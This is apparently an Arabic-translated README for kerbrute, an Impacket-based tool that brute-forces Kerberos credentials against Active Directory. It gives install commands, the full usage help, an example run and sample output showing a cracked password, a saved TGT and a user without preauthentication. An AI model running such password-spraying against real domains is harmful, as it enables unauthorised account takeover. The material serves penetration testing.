
برنامج نصي لتنفيذ هجوم القوة العمياء على Kerberos باستخدام Impacket
سكريبت لتنفيذ هجوم القوة الغاشمة على Kerberos باستخدام مكتبة Impacket.
عند تنفيذه، يتلقى كمُدخل مستخدمًا أو قائمة مستخدمين وكلمة مرور أو قائمة كلمات مرور. ثم ينفذ هجوم قوة غاشمة لتعداد:
نتيجة لذلك، يقوم السكريبت بإنشاء قائمة ببيانات الاعتماد الصالحة المكتشفة، و TGTs الناتجة عن تلك البيانات الصالحة.
من pypi:
pip3 install kerbrute
من المستودع:
git clone https://github.com/TarlogicSecurity/kerbrute
cd kerbrute
pip install -r requirements.txt
المساعدة بدون وسائط:
root@kali:~# kerbrute
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation
usage: kerbrute.py [-h] [-debug] (-user USER | -users USERS)
[-password PASSWORD | -passwords PASSWORDS] -domain DOMAIN
[-dc-ip <ip_address>] [-threads THREADS]
[-outputfile OUTPUTFILE] [-no-save-ticket]
optional arguments:
-h, --help show this help message and exit
-debug Turn DEBUG output ON
-user USER User to perform bruteforcing
-users USERS File with user per line
-password PASSWORD Password to perform bruteforcing
-passwords PASSWORDS File with password per line
-domain DOMAIN Domain to perform bruteforcing
-dc-ip <ip_address> IP Address of the domain controller
-threads THREADS Number of threads to perform bruteforcing. Default = 1
-outputfile OUTPUTFILE
File to save discovered user:password
-no-save-ticket Do not save retrieved TGTs with correct credentials
أمثلة:
./kerbrute.py -users users_file.txt -passwords passwords_file.txt -domain contoso.com
مثال على التنفيذ:
root@kali:~# kerbrute -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation
[*] Stupendous => triceratops:Sh4rpH0rns
[*] Saved TGT in triceratops.ccache
[*] Valid user => velociraptor [NOT PREAUTH]
[*] Valid user => trex
[*] Saved discovered passwords in jurassic_passwords.txt